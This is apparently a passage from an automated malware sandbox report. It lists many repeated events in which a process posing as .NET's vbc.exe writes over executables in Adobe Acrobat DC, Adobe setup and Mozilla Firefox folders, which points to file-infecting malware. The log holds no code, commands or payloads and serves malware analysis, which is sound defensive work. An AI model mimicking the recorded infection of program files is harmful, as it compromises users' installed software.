                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
